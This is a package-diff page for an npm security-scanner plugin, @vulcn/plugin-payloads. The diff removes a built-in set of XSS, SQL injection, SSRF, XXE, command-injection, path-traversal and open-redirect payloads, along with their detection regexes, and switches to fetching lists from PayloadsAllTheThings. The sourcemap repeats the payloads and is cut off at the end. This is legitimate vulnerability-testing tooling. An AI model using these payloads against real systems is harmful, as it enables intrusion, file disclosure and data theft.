npm - @vulcn/plugin-payloads - Versions diffs - 0.2.1 → 0.3.0 - Mend

@vulcn/plugin-payloads 0.2.1 → 0.3.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/dist/index.cjs CHANGED Viewed

@@ -30,295 +30,38 @@ var __toCommonJS = (mod) => __copyProps(__defProp({}, "__esModule", { value: tru
 // src/index.ts
 var index_exports = {};
 __export(index_exports, {
-  BUILTIN_PAYLOADS: () => BUILTIN_PAYLOADS,
+  clearPayloadBoxCache: () => clearPayloadBoxCache,
   default: () => index_default,
+  getAliases: () => getAliases,
+  getDescription: () => getDescription,
   getPayloadBoxTypes: () => getPayloadBoxTypes,
+  isValidPayloadName: () => isValidPayloadName,
   loadFromFile: () => loadFromFile,
   loadFromFiles: () => loadFromFiles,
-  loadPayloadBox: () => loadPayloadBox
+  loadPayloadBox: () => loadPayloadBox,
+  resolvePayloadType: () => resolvePayloadType
 });
 module.exports = __toCommonJS(index_exports);
 var import_zod2 = require("zod");
-// src/builtin.ts
-var BUILTIN_PAYLOADS = {
-  // XSS Payloads
-  "xss-basic": {
-    name: "xss-basic",
-    category: "xss",
-    description: "Basic XSS payloads with script tags and event handlers",
-    source: "builtin",
-    payloads: [
-      '<script>alert("XSS")</script>',
-      '<img src=x onerror=alert("XSS")>',
-      '"><script>alert("XSS")</script>',
-      "javascript:alert('XSS')",
-      '<svg onload=alert("XSS")>'
-    ],
-    detectPatterns: [
-      /<script[^>]*>alert\(/i,
-      /onerror\s*=\s*alert\(/i,
-      /onload\s*=\s*alert\(/i,
-      /javascript:alert\(/i
-    ]
-  },
-  "xss-event": {
-    name: "xss-event",
-    category: "xss",
-    description: "XSS via event handlers",
-    source: "builtin",
-    payloads: [
-      '" onfocus="alert(1)" autofocus="',
-      "' onmouseover='alert(1)'",
-      '<body onload=alert("XSS")>',
-      "<input onfocus=alert(1) autofocus>",
-      "<marquee onstart=alert(1)>",
-      "<video src=x onerror=alert(1)>",
-      "<audio src=x onerror=alert(1)>"
-    ],
-    detectPatterns: [
-      /onfocus\s*=\s*["']?alert/i,
-      /onmouseover\s*=\s*["']?alert/i,
-      /onload\s*=\s*["']?alert/i,
-      /onstart\s*=\s*["']?alert/i,
-      /onerror\s*=\s*["']?alert/i
-    ]
-  },
-  "xss-svg": {
-    name: "xss-svg",
-    category: "xss",
-    description: "XSS via SVG elements",
-    source: "builtin",
-    payloads: [
-      '<svg/onload=alert("XSS")>',
-      "<svg><script>alert(1)</script></svg>",
-      "<svg><animate onbegin=alert(1)>",
-      "<svg><set onbegin=alert(1)>",
-      '<svg><foreignObject><iframe srcdoc="<script>alert(1)</script>">'
-    ],
-    detectPatterns: [
-      /<svg[^>]*onload\s*=/i,
-      /<svg[^>]*>.*<script>/i,
-      /onbegin\s*=\s*alert/i
-    ]
-  },
-  "xss-polyglot": {
-    name: "xss-polyglot",
-    category: "xss",
-    description: "XSS polyglot payloads that work in multiple contexts",
-    source: "builtin",
-    payloads: [
-      "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcLiCk=alert() )//",
-      `'"-->]]>*/</script><script>alert(1)</script>`,
-      "<img src=x:x onerror=alert(1)//",
-      "'-alert(1)-'",
-      '"><img src=x onerror=alert(1)>'
-    ],
-    detectPatterns: [/alert\s*\(\s*\d*\s*\)/i, /<script>/i, /onerror\s*=/i]
-  },
-  // SQL Injection Payloads
-  "sqli-basic": {
-    name: "sqli-basic",
-    category: "sqli",
-    description: "Basic SQL injection payloads",
-    source: "builtin",
-    payloads: [
-      "' OR '1'='1",
-      "' OR '1'='1' --",
-      "1' OR '1'='1",
-      "admin'--",
-      "' UNION SELECT NULL--",
-      "1; DROP TABLE users--"
-    ],
-    detectPatterns: [
-      /sql.*syntax/i,
-      /mysql.*error/i,
-      /ORA-\d{5}/i,
-      /pg_query/i,
-      /sqlite.*error/i,
-      /unclosed.*quotation/i
-    ]
-  },
-  "sqli-error": {
-    name: "sqli-error",
-    category: "sqli",
-    description: "SQL injection payloads to trigger errors",
-    source: "builtin",
-    payloads: [
-      "'",
-      "''",
-      "`",
-      '"',
-      "')",
-      `'"`,
-      "1' AND '1'='2",
-      "1 AND 1=2",
-      "1'1",
-      "1 exec sp_"
-    ],
-    detectPatterns: [
-      /sql.*syntax/i,
-      /mysql.*error/i,
-      /ORA-\d{5}/i,
-      /postgresql.*error/i,
-      /sqlite.*error/i,
-      /quoted.*string.*properly.*terminated/i,
-      /ODBC.*Driver/i,
-      /Microsoft.*ODBC/i
-    ]
-  },
-  "sqli-blind": {
-    name: "sqli-blind",
-    category: "sqli",
-    description: "Blind SQL injection payloads (timing-based)",
-    source: "builtin",
-    payloads: [
-      "1' AND SLEEP(5)--",
-      "1; WAITFOR DELAY '0:0:5'--",
-      "1' AND (SELECT COUNT(*) FROM information_schema.tables)>0--",
-      "1' AND (SELECT SUBSTRING(@@version,1,1))='5'--",
-      "1 AND SLEEP(5)"
-    ],
-    detectPatterns: [
-      // Blind SQLi is detected by timing, not content patterns
-    ]
-  },
-  "sqli-union": {
-    name: "sqli-union",
-    category: "sqli",
-    description: "UNION-based SQL injection payloads",
-    source: "builtin",
-    payloads: [
-      "' UNION SELECT NULL--",
-      "' UNION SELECT NULL,NULL--",
-      "' UNION SELECT NULL,NULL,NULL--",
-      "' UNION SELECT 1,2,3--",
-      "' UNION SELECT username,password FROM users--",
-      "1 UNION SELECT ALL FROM information_schema.tables--"
-    ],
-    detectPatterns: [
-      /sql.*syntax/i,
-      /column.*count/i,
-      /different.*number.*columns/i
-    ]
-  },
-  // SSRF Payloads
-  "ssrf-basic": {
-    name: "ssrf-basic",
-    category: "ssrf",
-    description: "Server-Side Request Forgery payloads",
-    source: "builtin",
-    payloads: [
-      "http://localhost",
-      "http://127.0.0.1",
-      "http://[::1]",
-      "http://169.254.169.254/latest/meta-data/",
-      "http://metadata.google.internal/",
-      "http://0.0.0.0",
-      "file:///etc/passwd",
-      "dict://localhost:11211/",
-      "gopher://localhost:25/_HELO"
-    ],
-    detectPatterns: [
-      /root:.*:0:0/i,
-      // /etc/passwd content
-      /ami-id/i,
-      // AWS metadata
-      /instance-id/i,
-      /\{"Code"\s*:/i
-      // Cloud metadata JSON
-    ]
-  },
-  // XXE Payloads
-  "xxe-basic": {
-    name: "xxe-basic",
-    category: "xxe",
-    description: "XML External Entity injection payloads",
-    source: "builtin",
-    payloads: [
-      '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
-      '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://localhost">]><foo>&xxe;</foo>',
-      '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]><foo>&xxe;</foo>',
-      '<?xml version="1.0"?><!DOCTYPE data [<!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=index.php">]><data>&file;</data>'
-    ],
-    detectPatterns: [
-      /root:.*:0:0/i,
-      /\[fonts\]/i,
-      // win.ini content
-      /\[extensions\]/i
-    ]
-  },
-  // Command Injection Payloads
-  "cmd-basic": {
-    name: "cmd-basic",
-    category: "command-injection",
-    description: "OS command injection payloads",
-    source: "builtin",
-    payloads: [
-      "; id",
-      "| id",
-      "& id",
-      "&& id",
-      "|| id",
-      "`id`",
-      "$(id)",
-      "; cat /etc/passwd",
-      "| cat /etc/passwd",
-      "& whoami",
-      "| whoami",
-      "; dir",
-      "| dir"
-    ],
-    detectPatterns: [
-      /uid=\d+\([\w]+\)/i,
-      // Unix id command output
-      /root:.*:0:0/i,
-      /Volume Serial Number/i,
-      // Windows dir output
-      /Directory of/i
-    ]
-  },
-  // Path Traversal Payloads
-  "path-traversal": {
-    name: "path-traversal",
-    category: "path-traversal",
-    description: "Directory traversal payloads",
-    source: "builtin",
-    payloads: [
-      "../../../etc/passwd",
-      "..\\..\\..\\windows\\win.ini",
-      "....//....//....//etc/passwd",
-      "..%2f..%2f..%2fetc/passwd",
-      "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd",
-      "..%252f..%252f..%252fetc/passwd",
-      "/etc/passwd",
-      "C:\\Windows\\win.ini"
-    ],
-    detectPatterns: [/root:.*:0:0/i, /\[fonts\]/i, /\[extensions\]/i]
-  },
-  // Open Redirect Payloads
-  "open-redirect": {
-    name: "open-redirect",
-    category: "open-redirect",
-    description: "Open redirect payloads for phishing",
-    source: "builtin",
-    payloads: [
-      "//evil.com",
-      "https://evil.com",
-      "/\\evil.com",
-      "//evil.com/%2f..",
-      "////evil.com",
-      "https:evil.com",
-      "//evil%E3%80%82com",
-      "javascript:alert(document.domain)"
-    ],
-    detectPatterns: [
-      // Open redirects are detected by observing the redirect behavior
-    ]
-  }
-};
 // src/loaders/payloadbox.ts
+var ALIASES = {
+  // Short aliases
+  xss: "xss",
+  sqli: "sql-injection",
+  sql: "sql-injection",
+  xxe: "xxe",
+  cmd: "command-injection",
+  command: "command-injection",
+  redirect: "open-redirect",
+  traversal: "path-traversal",
+  lfi: "path-traversal",
+  // Full names (identity mapping)
+  "sql-injection": "sql-injection",
+  "command-injection": "command-injection",
+  "open-redirect": "open-redirect",
+  "path-traversal": "path-traversal"
+};
 var PAYLOADBOX_URLS = {
   xss: "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/IntrudersXSS.txt",
   "sql-injection": "https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/Auth_Bypass.txt",
@@ -335,17 +78,39 @@ var CATEGORY_MAP = {
   "open-redirect": "open-redirect",
   "path-traversal": "path-traversal"
 };
+var DESCRIPTIONS = {
+  xss: "Cross-Site Scripting \u2014 script injection, event handlers, SVG payloads",
+  "sql-injection": "SQL Injection \u2014 auth bypass, UNION, error-based, blind",
+  xxe: "XML External Entity \u2014 file read, SSRF via XML",
+  "command-injection": "OS Command Injection \u2014 shell execution, pipe injection",
+  "open-redirect": "Open Redirect \u2014 URL redirect to attacker domain",
+  "path-traversal": "Path Traversal \u2014 directory traversal with exotic encodings"
+};
 var cache = /* @__PURE__ */ new Map();
 function getPayloadBoxTypes() {
   return Object.keys(PAYLOADBOX_URLS);
 }
-function isPayloadBoxType(type) {
-  return type in PAYLOADBOX_URLS;
+function getAliases() {
+  return { ...ALIASES };
+}
+function resolvePayloadType(name) {
+  const resolved = ALIASES[name.toLowerCase()];
+  return resolved ?? null;
+}
+function isValidPayloadName(name) {
+  return resolvePayloadType(name) !== null;
 }
-async function loadPayloadBox(type, limit = 50, fetchFn = globalThis.fetch) {
-  if (!isPayloadBoxType(type)) {
+function getDescription(type) {
+  return DESCRIPTIONS[type] ?? type;
+}
+async function loadPayloadBox(name, limit = 50, fetchFn = globalThis.fetch) {
+  const type = resolvePayloadType(name);
+  if (!type) {
+    const available = getPayloadBoxTypes().join(", ");
+    const aliases = "xss, sqli, xxe, cmd, redirect, traversal";
     throw new Error(
-      `Unknown PayloadBox type: ${type}. Available: ${getPayloadBoxTypes().join(", ")}`
+      `Unknown payload type: "${name}". Available: ${available}
+Short aliases: ${aliases}`
     );
   }
   const cached = cache.get(type);
@@ -363,12 +128,12 @@ async function loadPayloadBox(type, limit = 50, fetchFn = globalThis.fetch) {
     const text = await response.text();
     const payloads = text.split("\n").map((line) => line.trim()).filter((line) => line && !line.startsWith("#")).slice(0, limit);
     if (payloads.length === 0) {
-      throw new Error(`No payloads found in ${type}`);
+      throw new Error(`No payloads found for ${type}`);
     }
     const payload = {
-      name: `payloadbox:${type}`,
+      name: type,
       category: CATEGORY_MAP[type],
-      description: `PayloadsAllTheThings ${type} - ${payloads.length} payloads`,
+      description: `${DESCRIPTIONS[type]} (${payloads.length} payloads from PayloadsAllTheThings)`,
       payloads,
       detectPatterns: getDefaultPatterns(type),
       source: "payloadbox"
@@ -377,7 +142,7 @@ async function loadPayloadBox(type, limit = 50, fetchFn = globalThis.fetch) {
     return payload;
   } catch (err) {
     throw new Error(
-      `Failed to fetch PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`
+      `Failed to fetch payloads for "${type}": ${err instanceof Error ? err.message : String(err)}`
     );
   }
 }
@@ -411,6 +176,9 @@ function getDefaultPatterns(type) {
       return [];
   }
 }
+function clearPayloadBoxCache() {
+  cache.clear();
+}
 // src/loaders/file.ts
 var import_promises = require("fs/promises");
@@ -507,26 +275,15 @@ function parseDetectPatterns(patterns) {
 // src/index.ts
 var configSchema = import_zod2.z.object({
   /**
-   * Include built-in payloads (default: true)
+   * Payload types to load from PayloadsAllTheThings.
+   * Accepts short aliases: xss, sqli, xxe, cmd, redirect, traversal
+   * @example ["xss", "sqli"]
    */
-  builtin: import_zod2.z.boolean().default(true),
+  types: import_zod2.z.array(import_zod2.z.string()).optional(),
   /**
-   * Specific built-in payload names to include (if not all)
+   * Maximum payloads per type (default 50)
    */
-  include: import_zod2.z.array(import_zod2.z.string()).optional(),
-  /**
-   * Built-in payload names to exclude
-   */
-  exclude: import_zod2.z.array(import_zod2.z.string()).optional(),
-  /**
-   * PayloadBox types to fetch from PayloadsAllTheThings
-   * e.g., ["xss", "sql-injection", "xxe"]
-   */
-  payloadbox: import_zod2.z.array(import_zod2.z.string()).optional(),
-  /**
-   * Limit per PayloadBox type
-   */
-  payloadboxLimit: import_zod2.z.number().default(50),
+  limit: import_zod2.z.number().default(50),
   /**
    * Custom payload files to load (YAML/JSON)
    */
@@ -534,47 +291,23 @@ var configSchema = import_zod2.z.object({
 });
 var plugin = {
   name: "@vulcn/plugin-payloads",
-  version: "0.2.0",
+  version: "0.3.0",
   apiVersion: 1,
-  description: "Official payload loader plugin - built-in, PayloadBox, and custom files",
+  description: "Payload loader \u2014 PayloadsAllTheThings + custom files",
   configSchema,
   hooks: {
     onInit: async (ctx) => {
       const config = configSchema.parse(ctx.config);
       const loadedPayloads = [];
-      if (config.builtin) {
-        let builtinNames = Object.keys(BUILTIN_PAYLOADS);
-        if (config.include?.length) {
-          builtinNames = builtinNames.filter(
-            (name) => config.include.includes(name)
-          );
-        }
-        if (config.exclude?.length) {
-          builtinNames = builtinNames.filter(
-            (name) => !config.exclude.includes(name)
-          );
-        }
-        for (const name of builtinNames) {
-          const payload = BUILTIN_PAYLOADS[name];
-          if (payload) {
-            loadedPayloads.push(payload);
-          }
-        }
-        ctx.logger.debug(`Loaded ${builtinNames.length} built-in payload sets`);
-      }
-      if (config.payloadbox?.length) {
-        for (const type of config.payloadbox) {
+      if (config.types?.length) {
+        for (const type of config.types) {
           try {
-            const payload = await loadPayloadBox(
-              type,
-              config.payloadboxLimit,
-              ctx.fetch
-            );
+            const payload = await loadPayloadBox(type, config.limit, ctx.fetch);
             loadedPayloads.push(payload);
-            ctx.logger.debug(`Loaded PayloadBox: ${type}`);
+            ctx.logger.debug(`Loaded payload type: ${type}`);
           } catch (err) {
             ctx.logger.error(
-              `Failed to load PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`
+              `Failed to load "${type}": ${err instanceof Error ? err.message : String(err)}`
             );
           }
         }
@@ -602,10 +335,14 @@ var plugin = {
 var index_default = plugin;
 // Annotate the CommonJS export names for ESM import in node:
 0 && (module.exports = {
-  BUILTIN_PAYLOADS,
+  clearPayloadBoxCache,
+  getAliases,
+  getDescription,
   getPayloadBoxTypes,
+  isValidPayloadName,
   loadFromFile,
   loadFromFiles,
-  loadPayloadBox
+  loadPayloadBox,
+  resolvePayloadType
 });
 //# sourceMappingURL=index.cjs.map

package/dist/index.cjs.map CHANGED Viewed

	@@ -1 +1 @@
1	- {"version":3,"sources":["../src/index.ts","../src/builtin.ts","../src/loaders/payloadbox.ts","../src/loaders/file.ts"],"sourcesContent":["/*\n @vulcn/plugin-payloads\n * Official payload loader plugin for Vulcn\n \n Provides:\n * - Built-in payloads (XSS, SQLi, SSRF, XXE, etc.)\n * - PayloadBox loader (PayloadsAllTheThings)\n * - Custom file loader (YAML/JSON)\n /\n\nimport { z } from \"zod\";\nimport type { VulcnPlugin, PluginContext, RuntimePayload } from \"@vulcn/engine\";\nimport { BUILTIN_PAYLOADS } from \"./builtin\";\nimport { loadPayloadBox } from \"./loaders/payloadbox\";\nimport { loadFromFiles } from \"./loaders/file\";\n\n/\n Plugin configuration schema\n /\nconst configSchema = z.object({\n /\n Include built-in payloads (default: true)\n /\n builtin: z.boolean().default(true),\n\n /\n Specific built-in payload names to include (if not all)\n /\n include: z.array(z.string()).optional(),\n\n /\n Built-in payload names to exclude\n /\n exclude: z.array(z.string()).optional(),\n\n /\n PayloadBox types to fetch from PayloadsAllTheThings\n * e.g., [\"xss\", \"sql-injection\", \"xxe\"]\n /\n payloadbox: z.array(z.string()).optional(),\n\n /\n Limit per PayloadBox type\n /\n payloadboxLimit: z.number().default(50),\n\n /\n Custom payload files to load (YAML/JSON)\n /\n files: z.array(z.string()).optional(),\n});\n\nexport type PayloadsPluginConfig = z.infer<typeof configSchema>;\n\n/\n Payloads Plugin - loads payloads from various sources\n /\nconst plugin: VulcnPlugin = {\n name: \"@vulcn/plugin-payloads\",\n version: \"0.2.0\",\n apiVersion: 1,\n description:\n \"Official payload loader plugin - built-in, PayloadBox, and custom files\",\n\n configSchema,\n\n hooks: {\n onInit: async (ctx: PluginContext) => {\n const config = configSchema.parse(ctx.config);\n const loadedPayloads: RuntimePayload[] = [];\n\n // 1. Load built-in payloads\n if (config.builtin) {\n let builtinNames = Object.keys(BUILTIN_PAYLOADS);\n\n // Filter by include list if provided\n if (config.include?.length) {\n builtinNames = builtinNames.filter((name) =>\n config.include!.includes(name),\n );\n }\n\n // Remove excluded payloads\n if (config.exclude?.length) {\n builtinNames = builtinNames.filter(\n (name) => !config.exclude!.includes(name),\n );\n }\n\n for (const name of builtinNames) {\n const payload = BUILTIN_PAYLOADS[name];\n if (payload) {\n loadedPayloads.push(payload);\n }\n }\n\n ctx.logger.debug(`Loaded ${builtinNames.length} built-in payload sets`);\n }\n\n // 2. Load from PayloadBox\n if (config.payloadbox?.length) {\n for (const type of config.payloadbox) {\n try {\n const payload = await loadPayloadBox(\n type,\n config.payloadboxLimit,\n ctx.fetch,\n );\n loadedPayloads.push(payload);\n ctx.logger.debug(`Loaded PayloadBox: ${type}`);\n } catch (err) {\n ctx.logger.error(\n `Failed to load PayloadBox ${type}: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n }\n }\n\n // 3. Load from custom files\n if (config.files?.length) {\n try {\n const filePayloads = await loadFromFiles(config.files);\n loadedPayloads.push(...filePayloads);\n ctx.logger.debug(\n `Loaded ${filePayloads.length} payload sets from files`,\n );\n } catch (err) {\n ctx.logger.error(\n `Failed to load custom files: ${err instanceof Error ? err.message : String(err)}`,\n );\n }\n }\n\n // Add to shared context\n ctx.payloads.push(...loadedPayloads);\n\n ctx.logger.info(\n `Payloads plugin loaded ${loadedPayloads.length} payload sets`,\n );\n },\n },\n};\n\nexport default plugin;\n\n// Re-export for direct access\nexport { BUILTIN_PAYLOADS } from \"./builtin\";\nexport { loadPayloadBox, getPayloadBoxTypes } from \"./loaders/payloadbox\";\nexport { loadFromFiles, loadFromFile } from \"./loaders/file\";\n","/\n Built-in security payloads\n * Curated, tested, fast defaults for common vulnerability categories\n /\n\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/\n Built-in payloads - curated, tested, fast defaults\n /\nexport const BUILTIN_PAYLOADS: Record<string, RuntimePayload> = {\n // XSS Payloads\n \"xss-basic\": {\n name: \"xss-basic\",\n category: \"xss\",\n description: \"Basic XSS payloads with script tags and event handlers\",\n source: \"builtin\",\n payloads: [\n '<script>alert(\"XSS\")</script>',\n '<img src=x onerror=alert(\"XSS\")>',\n '\"><script>alert(\"XSS\")</script>',\n \"javascript:alert('XSS')\",\n '<svg onload=alert(\"XSS\")>',\n ],\n detectPatterns: [\n /<script[^>]>alert\\(/i,\n /onerror\\s=\\salert\\(/i,\n /onload\\s=\\salert\\(/i,\n /javascript:alert\\(/i,\n ],\n },\n \"xss-event\": {\n name: \"xss-event\",\n category: \"xss\",\n description: \"XSS via event handlers\",\n source: \"builtin\",\n payloads: [\n '\" onfocus=\"alert(1)\" autofocus=\"',\n \"' onmouseover='alert(1)'\",\n '<body onload=alert(\"XSS\")>',\n \"<input onfocus=alert(1) autofocus>\",\n \"<marquee onstart=alert(1)>\",\n \"<video src=x onerror=alert(1)>\",\n \"<audio src=x onerror=alert(1)>\",\n ],\n detectPatterns: [\n /onfocus\\s=\\s[\"']?alert/i,\n /onmouseover\\s=\\s[\"']?alert/i,\n /onload\\s=\\s[\"']?alert/i,\n /onstart\\s=\\s[\"']?alert/i,\n /onerror\\s=\\s[\"']?alert/i,\n ],\n },\n \"xss-svg\": {\n name: \"xss-svg\",\n category: \"xss\",\n description: \"XSS via SVG elements\",\n source: \"builtin\",\n payloads: [\n '<svg/onload=alert(\"XSS\")>',\n \"<svg><script>alert(1)</script></svg>\",\n \"<svg><animate onbegin=alert(1)>\",\n \"<svg><set onbegin=alert(1)>\",\n '<svg><foreignObject><iframe srcdoc=\"<script>alert(1)</script>\">',\n ],\n detectPatterns: [\n /<svg[^>]onload\\s=/i,\n /<svg[^>]>.<script>/i,\n /onbegin\\s=\\salert/i,\n ],\n },\n \"xss-polyglot\": {\n name: \"xss-polyglot\",\n category: \"xss\",\n description: \"XSS polyglot payloads that work in multiple contexts\",\n source: \"builtin\",\n payloads: [\n \"jaVasCript:/-/`/\\\\`/'/\\\"//(/ /oNcLiCk=alert() )//\",\n \"'\\\"-->]]>/</script><script>alert(1)</script>\",\n \"<img src=x:x onerror=alert(1)//\",\n \"'-alert(1)-'\",\n '\"><img src=x onerror=alert(1)>',\n ],\n detectPatterns: [/alert\\s\$\\s\\d\\s\$/i, /<script>/i, /onerror\\s=/i],\n },\n\n // SQL Injection Payloads\n \"sqli-basic\": {\n name: \"sqli-basic\",\n category: \"sqli\",\n description: \"Basic SQL injection payloads\",\n source: \"builtin\",\n payloads: [\n \"' OR '1'='1\",\n \"' OR '1'='1' --\",\n \"1' OR '1'='1\",\n \"admin'--\",\n \"' UNION SELECT NULL--\",\n \"1; DROP TABLE users--\",\n ],\n detectPatterns: [\n /sql.syntax/i,\n /mysql.error/i,\n /ORA-\\d{5}/i,\n /pg_query/i,\n /sqlite.error/i,\n /unclosed.quotation/i,\n ],\n },\n \"sqli-error\": {\n name: \"sqli-error\",\n category: \"sqli\",\n description: \"SQL injection payloads to trigger errors\",\n source: \"builtin\",\n payloads: [\n \"'\",\n \"''\",\n \"`\",\n '\"',\n \"')\",\n \"'\\\"\",\n \"1' AND '1'='2\",\n \"1 AND 1=2\",\n \"1'1\",\n \"1 exec sp_\",\n ],\n detectPatterns: [\n /sql.syntax/i,\n /mysql.error/i,\n /ORA-\\d{5}/i,\n /postgresql.error/i,\n /sqlite.error/i,\n /quoted.string.properly.terminated/i,\n /ODBC.Driver/i,\n /Microsoft.ODBC/i,\n ],\n },\n \"sqli-blind\": {\n name: \"sqli-blind\",\n category: \"sqli\",\n description: \"Blind SQL injection payloads (timing-based)\",\n source: \"builtin\",\n payloads: [\n \"1' AND SLEEP(5)--\",\n \"1; WAITFOR DELAY '0:0:5'--\",\n \"1' AND (SELECT COUNT() FROM information_schema.tables)>0--\",\n \"1' AND (SELECT SUBSTRING(@@version,1,1))='5'--\",\n \"1 AND SLEEP(5)\",\n ],\n detectPatterns: [\n // Blind SQLi is detected by timing, not content patterns\n ],\n },\n \"sqli-union\": {\n name: \"sqli-union\",\n category: \"sqli\",\n description: \"UNION-based SQL injection payloads\",\n source: \"builtin\",\n payloads: [\n \"' UNION SELECT NULL--\",\n \"' UNION SELECT NULL,NULL--\",\n \"' UNION SELECT NULL,NULL,NULL--\",\n \"' UNION SELECT 1,2,3--\",\n \"' UNION SELECT username,password FROM users--\",\n \"1 UNION SELECT ALL FROM information_schema.tables--\",\n ],\n detectPatterns: [\n /sql.syntax/i,\n /column.count/i,\n /different.number.columns/i,\n ],\n },\n\n // SSRF Payloads\n \"ssrf-basic\": {\n name: \"ssrf-basic\",\n category: \"ssrf\",\n description: \"Server-Side Request Forgery payloads\",\n source: \"builtin\",\n payloads: [\n \"http://localhost\",\n \"http://127.0.0.1\",\n \"http://[::1]\",\n \"http://169.254.169.254/latest/meta-data/\",\n \"http://metadata.google.internal/\",\n \"http://0.0.0.0\",\n \"file:///etc/passwd\",\n \"dict://localhost:11211/\",\n \"gopher://localhost:25/_HELO\",\n ],\n detectPatterns: [\n /root:.:0:0/i, // /etc/passwd content\n /ami-id/i, // AWS metadata\n /instance-id/i,\n /\\{\"Code\"\\s:/i, // Cloud metadata JSON\n ],\n },\n\n // XXE Payloads\n \"xxe-basic\": {\n name: \"xxe-basic\",\n category: \"xxe\",\n description: \"XML External Entity injection payloads\",\n source: \"builtin\",\n payloads: [\n '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>',\n '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://localhost\">]><foo>&xxe;</foo>',\n '<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\">]><foo>&xxe;</foo>',\n '<?xml version=\"1.0\"?><!DOCTYPE data [<!ENTITY file SYSTEM \"php://filter/convert.base64-encode/resource=index.php\">]><data>&file;</data>',\n ],\n detectPatterns: [\n /root:.:0:0/i,\n /\\[fonts\\]/i, // win.ini content\n /\\[extensions\\]/i,\n ],\n },\n\n // Command Injection Payloads\n \"cmd-basic\": {\n name: \"cmd-basic\",\n category: \"command-injection\",\n description: \"OS command injection payloads\",\n source: \"builtin\",\n payloads: [\n \"; id\",\n \"\| id\",\n \"& id\",\n \"&& id\",\n \"\|\| id\",\n \"`id`\",\n \"$(id)\",\n \"; cat /etc/passwd\",\n \"\| cat /etc/passwd\",\n \"& whoami\",\n \"\| whoami\",\n \"; dir\",\n \"\| dir\",\n ],\n detectPatterns: [\n /uid=\\d+\$[\\w]+\$/i, // Unix id command output\n /root:.:0:0/i,\n /Volume Serial Number/i, // Windows dir output\n /Directory of/i,\n ],\n },\n\n // Path Traversal Payloads\n \"path-traversal\": {\n name: \"path-traversal\",\n category: \"path-traversal\",\n description: \"Directory traversal payloads\",\n source: \"builtin\",\n payloads: [\n \"../../../etc/passwd\",\n \"..\\\\..\\\\..\\\\windows\\\\win.ini\",\n \"....//....//....//etc/passwd\",\n \"..%2f..%2f..%2fetc/passwd\",\n \"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd\",\n \"..%252f..%252f..%252fetc/passwd\",\n \"/etc/passwd\",\n \"C:\\\\Windows\\\\win.ini\",\n ],\n detectPatterns: [/root:.:0:0/i, /\\[fonts\\]/i, /\\[extensions\\]/i],\n },\n\n // Open Redirect Payloads\n \"open-redirect\": {\n name: \"open-redirect\",\n category: \"open-redirect\",\n description: \"Open redirect payloads for phishing\",\n source: \"builtin\",\n payloads: [\n \"//evil.com\",\n \"https://evil.com\",\n \"/\\\\evil.com\",\n \"//evil.com/%2f..\",\n \"////evil.com\",\n \"https:evil.com\",\n \"//evil%E3%80%82com\",\n \"javascript:alert(document.domain)\",\n ],\n detectPatterns: [\n // Open redirects are detected by observing the redirect behavior\n ],\n },\n};\n\n/*\n Get all built-in payload names\n /\nexport function getBuiltinPayloadNames(): string[] {\n return Object.keys(BUILTIN_PAYLOADS);\n}\n\n/\n Get all built-in categories\n /\nexport function getBuiltinCategories(): PayloadCategory[] {\n const categories = new Set<PayloadCategory>();\n for (const payload of Object.values(BUILTIN_PAYLOADS)) {\n categories.add(payload.category);\n }\n return Array.from(categories);\n}\n","/\n PayloadBox Loader\n * Fetches payloads from PayloadsAllTheThings GitHub repository\n /\n\nimport type { RuntimePayload, PayloadCategory } from \"@vulcn/engine\";\n\n/\n Supported PayloadBox types\n /\nexport type PayloadBoxType =\n \| \"xss\"\n \| \"sql-injection\"\n \| \"xxe\"\n \| \"command-injection\"\n \| \"open-redirect\"\n \| \"path-traversal\";\n\n/\n PayloadsAllTheThings URLs - raw GitHub content\n /\nconst PAYLOADBOX_URLS: Record<PayloadBoxType, string> = {\n xss: \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/IntrudersXSS.txt\",\n \"sql-injection\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/SQL%20Injection/Intruder/Auth_Bypass.txt\",\n xxe: \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XXE%20Injection/Intruders/xxe_payloads.txt\",\n \"command-injection\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Command%20Injection/Intruder/command_exec.txt\",\n \"open-redirect\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Open%20Redirect/Intruder/Open-Redirect-payloads.txt\",\n \"path-traversal\":\n \"https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/Directory%20Traversal/Intruder/traversals-8-deep-exotic-encoding.txt\",\n};\n\n/\n Map PayloadBox types to our categories\n /\nconst CATEGORY_MAP: Record<PayloadBoxType, PayloadCategory> = {\n xss: \"xss\",\n \"sql-injection\": \"sqli\",\n xxe: \"xxe\",\n \"command-injection\": \"command-injection\",\n \"open-redirect\": \"open-redirect\",\n \"path-traversal\": \"path-traversal\",\n};\n\n/\n Cache for fetched payloads\n /\nconst cache: Map<PayloadBoxType, RuntimePayload> = new 